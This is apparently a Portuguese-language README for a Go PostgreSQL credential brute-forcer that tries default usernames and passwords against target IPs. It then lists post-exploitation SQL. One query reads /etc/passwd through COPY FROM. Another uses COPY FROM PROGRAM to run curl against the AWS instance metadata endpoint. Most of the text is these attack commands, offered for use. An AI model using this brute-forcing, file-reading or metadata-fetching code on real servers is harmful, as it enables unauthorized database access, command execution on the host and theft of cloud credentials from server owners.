
Esta ferramenta recebe uma lista de credenciais padrão e a testa contra um servidor PostgreSQL, registrando quais funcionam e os bancos de dados aos quais ela tem acesso.
Este script Go lê uma lista de nomes de usuários e senhas de um arquivo chamado creds.txt e os testa contra um banco de dados PostgreSQL.
O script aceita um IP do servidor PostgreSQL como argumento de linha de comando ou um arquivo de texto com IPs.
Se o acesso for concedido, o script escreve essa saída em um arquivo chamado pg-output.txt.
Se o usuário postgres estiver disponível, normalmente é um superusuário que pode permitir RCE, LFI ou SSRf.
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest
go run postgres-brute.go 1.1.1.1
postgres
Obter /etc/passwd/
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;
SSRF - Obter metadados da AWS
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;